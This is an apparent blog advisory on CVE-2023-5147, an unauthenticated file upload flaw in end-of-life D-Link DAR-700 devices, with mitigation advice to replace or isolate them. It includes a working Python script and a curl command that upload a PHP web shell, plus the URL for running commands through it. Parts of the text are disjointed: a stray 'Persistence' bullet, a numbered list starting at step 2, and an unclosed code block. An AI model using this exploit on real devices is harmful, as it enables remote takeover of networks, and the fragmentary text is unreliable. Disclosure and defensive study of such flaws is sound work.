In late 2023, security researchers uncovered a critical vulnerability affecting legacy D-Link DAR-700 devices (firmware up to 20151231). Tracked as CVE-2023-5147, this issue allows unauthenticated attackers to upload arbitrary files via a vulnerable endpoint in the admin interface. This post explains the vulnerability, its exploitation, and what users should do, especially since D-Link has no plans to fix this issue.
What is CVE-2023-5147?
CVE-2023-5147 is an unrestricted file upload vulnerability found in the D-Link DAR-700 series, specifically in the /sysmanage/updateos.php script. The vector is the POST parameter 1_file_upload. An attacker could abuse this to upload any file (including web shells or other malicious code) to the server and gain full remote access.
Reference:
- Vuldb VDB-240243
- NVD CVE-2023-5147
Note: These devices are end-of-life and are no longer supported or updated by D-Link. You should replace them immediately.
Persistence: Install backdoors that survive reboots.
- No Authentication Needed: Anyone on the network or internet can exploit this if the interface is accessible.
How Does the Exploit Work?
The vulnerable script, /sysmanage/updateos.php, was supposed to handle firmware updates. Because it fails to check the contents or extension of uploaded files and doesn’t require authentication in some configs, attackers can POST any file to it.
Here’s a Python example that uploads a PHP shell to the device
import requests
url = "http://TARGET-IP/sysmanage/updateos.php";
shell = {
'1_file_upload': ('shell.php', b'<?php system($_GET["cmd"]); ?>', 'application/octet-stream')
}
response = requests.post(url, files=shell)
print("Status Code:", response.status_code)
print("Response:", response.text)
Replace TARGET-IP with the target device’s IP address.
- After upload, access the shell at http://TARGET-IP/uploads/shell.php?cmd=whoami
Warning: Running this against a device you don’t own is illegal.
Find a vulnerable D-Link DAR-700 device, typically on outdated networks.
2. Check if /sysmanage/updateos.php is accessible (often at http://[IP]/sysmanage/updateos.php).
`bash
curl -F "1_file_upload=@shell.php" http://TARGET-IP/sysmanage/updateos.php
Original Vulnerability Disclosure & References
- VulDB Report: https://vuldb.com/?id.240243
- NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2023-5147
The issue was initially reported by researchers, who also confirmed no fix would be released; the product is officially end-of-life.
Replace with a supported, currently-updated model.
- Until replacement: ensure the device web interface is NEVER accessible from untrusted networks (e.g., the Internet).
Conclusions
CVE-2023-5147 is an example of why using unsupported network hardware puts you at major risk, especially for businesses. Attackers can—and do—exploit old flaws in abandoned products to compromise networks with almost no effort. If you are still running a D-Link DAR-700, the time to replace it was *yesterday*.
Stay safe: always keep network equipment patched and supported.
Further Reading:
- VulDB Advisory VDB-240243
- NVD CVE-2023-5147
- D-Link Product Support Notices
*If you found this helpful, share it with your IT department or a friend still running old network gear!*
Timeline
Published on: 09/25/2023 01:15:19 UTC
Last modified on: 11/07/2023 04:23:31 UTC